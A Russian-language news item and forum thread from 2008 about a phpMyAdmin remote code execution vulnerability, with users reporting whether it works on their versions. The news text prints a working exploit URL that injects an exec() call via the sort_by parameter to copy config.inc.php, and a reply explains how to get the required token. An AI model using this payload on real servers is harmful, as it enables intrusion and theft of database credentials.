https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html В популярном web-интерфейсе для управления СУБД MySQL - phpMyAdmin (http://www.phpmyadmin.net), используемом на многих хостингах, обнаружена (http://www.securityfocus.com/bid/31188) критическая уязвимость, позволяющая удаленному злоумышленнику выполнить PHP-код на сервере, включая вызов внешних команд через PHP-функцию exec(). Проблема устранена в phpMyAdmin версиях 2.11.9.1 (http://www.phpmyadmin.net/home_page/downloads.php?relnotes=1) и &lt;a href="http://www.phpmyadmin.net/home_page/downloads.php#3.0.0-rc2" rel="external"&gt;3.0.0-rc2&lt;/a&gt;.<br><br><br>Пример, запроса выполняющего команду "cp":<br><br>http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]<br><br>URL: http://www.securityfocus.com/bid/31188<br>Новость: http://www.opennet.ru/opennews/art.shtml?num=17946<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#17 Fri, 19 Sep 2008 17:56:34 GMT И это есть истина<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#16 Fri, 19 Sep 2008 11:57:05 GMT &gt;&gt;Блин нада бы проверить, но что такое "Valid token" ? в смысле <br>&gt;&gt;что там писать)) <br>&gt;<br>&gt;пример адреса в phpmyadmine <br>&gt;http://localhost/phpmyadmin/server_databases.php?token=79f5bb3bf38a77ae9669aa7861429d68 <br>&gt;<br>&gt;79f5bb3bf38a77ae9669aa7861429d68 - вот это и есть этот токен <br><br>ток не стоит забывать, что нормально описанный пхп: отрубленые глобалы, вызов екзеков( и ещё несколько), права нободи, вообщем, весь набор того что нужно сделать чтоб хостинг можно было бы назвать НЕ дырявым(а не только сайты). Отсуда у кого-то работает, а у кого-то хрен(а мож просто кривые руки). Отсуда и слово КРИТИЧЕСКАЯ весьма относительно, в данном случае самое критическое в етой уязвимости - ето руки админа.<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#15 Fri, 19 Sep 2008 06:47:56 GMT &gt;Блин нада бы проверить, но что такое "Valid token" ? в смысле <br>&gt;что там писать)) <br><br>пример адреса в phpmyadmine<br>http://localhost/phpmyadmin/server_databases.php?token=79f5bb3bf38a77ae9669aa7861429d68<br><br>79f5bb3bf38a77ae9669aa7861429d68 - вот это и есть этот токен<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#13 Thu, 18 Sep 2008 10:45:52 GMT ну дырка, ну и что<br>все равно чтоб ею воспользоваться надо знать логин/пасс на базу<br>а у тех у кого есть такая информация обычно и так шелл доступ на сервер имеют<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#10 Thu, 18 Sep 2008 07:56:40 GMT &gt;phpMyAdmin - 2.11.8.1 <br>&gt;Уязвимость не срабатывает. <br>&gt;Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch Server at localhost Port 80 <br>&gt;phpMyAdmin 2.11.3deb1ubuntu1 <br>&gt;Тут тоже уязвимость не срабатывает)) <br><br>Блин нада бы проверить, но что такое "Valid token" ? в смысле что там писать))<br><br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#9 Thu, 18 Sep 2008 07:23:28 GMT phpMyAdmin - 2.11.8.1<br>Уязвимость не срабатывает.<br>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch Server at localhost Port 80<br>phpMyAdmin 2.11.3deb1ubuntu1<br>Тут тоже уязвимость не срабатывает))<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#8 Thu, 18 Sep 2008 06:02:37 GMT phpMyAdmin 2.10.3, FreeBsd 6.2 - уязвимость срабатывает.<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#5 Thu, 18 Sep 2008 02:57:51 GMT Package: phpmyadmin<br>State: installed<br>Automatically installed: yes<br>Version: 4:2.11.3-1ubuntu1.1<br><br>не срабатывает<br> https://ssl.opennet.dev/openforum/vsluhforumID3/43907.html#3 Thu, 18 Sep 2008 00:50:08 GMT У меня на phpMyAdmin-2.11.9+FreeBSD 7.1 не срабатывает.<br>